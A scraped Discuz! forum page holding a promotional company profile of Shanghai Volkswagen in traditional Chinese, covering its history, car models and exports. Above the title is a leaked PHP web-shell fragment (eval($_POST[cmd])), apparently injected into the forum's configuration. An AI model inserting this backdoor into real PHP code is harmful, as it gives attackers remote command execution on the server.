');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 上海大眾 - 改裝俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

上海大眾

上海大眾汽車有限公司(以下簡稱上海大眾)是中德合資的轎車生產企業,成立於1985年3月,中德雙方投資比例各佔50%,合同期限為45年。經過多次的增資發展,上海大眾的註冊資本已達到100億元人民幣。
  上海大眾目前已形成了五個平台的產品結構,包括桑塔納、帕薩特、POLO、高爾、途安平台,是國內車型最多的汽車企業。
  桑塔納是上海大眾引進的第一款車型,也是一個在中國汽車工業發展史上具有傳奇色彩的品牌。自1983年4月成功組裝第一輛桑塔納至今,桑塔納已進行了幾百項技術改進,技術含量不斷提升,並一直保持著良好的銷售勢頭,被譽為中國車壇的「常青樹」。
  1992年,上海大眾開始與德國大眾、巴西大眾聯合開發桑塔納2000型。桑塔納2000型成為中國人參與開發的第一個車型。在基本具備產品開發的軟、硬件條件的情況下,上海大眾邁進了自主開發的階段。2004年3月,上海大眾推出了首款自主開發的產品——桑塔納3000「超越者」。
  緊湊型轎車POLO於2002年4月全球同步上市。POLO代表了當今轎車工業緊湊型轎車的最高水平,自上市以來,POLO以尖端科技和潮流魅力廣受矚目,備受市場青睞,獲得了「2003年度車」、「風雲車2003」等多個獎項,並蟬聯2003年、2004年「家用轎車用戶滿意度第一」。
  2003年2月28日,GOL兩門車開創了國內轎車產品之先河;2003年8月9日,GOL四門轎車與廣大消費者見面;2004年4月23日,兩門運動版GOL旋風上市;2004年12月30日,擁有更富個性化的外觀色彩和內飾的GOL旋彩上市,再次吸引了時尚一族的眼球。上海大眾通過差異化的定位策略,已經使GOL在競爭激烈的兩廂車市場中形成了自身的競爭優勢。
  上海大眾途安於2004年11月23日正式上市。途安是在緊湊型轎車的底盤基礎上開發的多功能廂型轎車,誕生於德國大眾全新的A級轎車PQ35平台。作為國內第一款真正意義上的多功能轎車,途安應用簡潔、時尚的設計理念,在家用、商務和休閒性上達到了完美結合,兼具轎車的舒適、安全和MPV的多功能性,以科技化、人性化和多樣化為中國汽車市場樹立了全新的標桿,一舉奪得 「最佳製造工藝獎」、「CCTV年度多功能轎車獎」、「最佳空間表現車型」等多項大獎。
  「質量是上海大眾的生命」,上海大眾作為中德合資企業,繼承了德國大眾對產品質量的嚴謹態度和精益求精的精神,精湛的製造工藝技術從一開始就融入企業的血液之中。上海大眾成立之初就在國內建立並最早推出健全的質量管理體系,無論對供應商還是企業自身,從生產規劃、工藝裝備的確定,到設備的維護保養;從原材料進庫到成品出廠,每一道都處於縝密的質量監控之下。
  安全性對於一輛轎車來說至關重要。上海大眾廣泛採用世界領先的激光焊技術,在目前國內僅有的5款應用激光焊接技術的轎車中,就有三款來自上海大眾:帕薩特、POLO、途安。在POLO、PASSAT和途安車身上的激光焊長度是目前國內最長的,這大大增強了車身的扭轉剛度和強度,從而提高了整車的安全性。
  優良的品質和無微不至的關懷,是上海大眾對用戶永遠的承諾。從開始生產上海桑塔納轎車那天起,我們就建立起自己的銷售和售後服務網絡體系。目前,上海大眾「四位一體」經銷商和特約維修站總計達到1200多家,形成了分佈最廣、布點最密的上海大眾轎車售後服務網絡。
  上海大眾不僅要「引進來」,也要走出去。由上海大眾開發的出口版右置方向POLO轎車,2003年起成功批量出口澳大利亞,這是中國轎車首次出口到發達國家。2004年3月上市的桑塔納3000「超越者」,也於當年10月實現批量出口到哈薩克斯坦。
  以「追求卓越 永爭第一」為核心價值觀的上海大眾,不僅要成為全國一流的企業,更要順應全球經濟一體化的潮流,躋身世界一流的轎車企業,努力為中國轎車工業的發展和中國經濟的騰飛作出自己應有的貢獻。
返回列表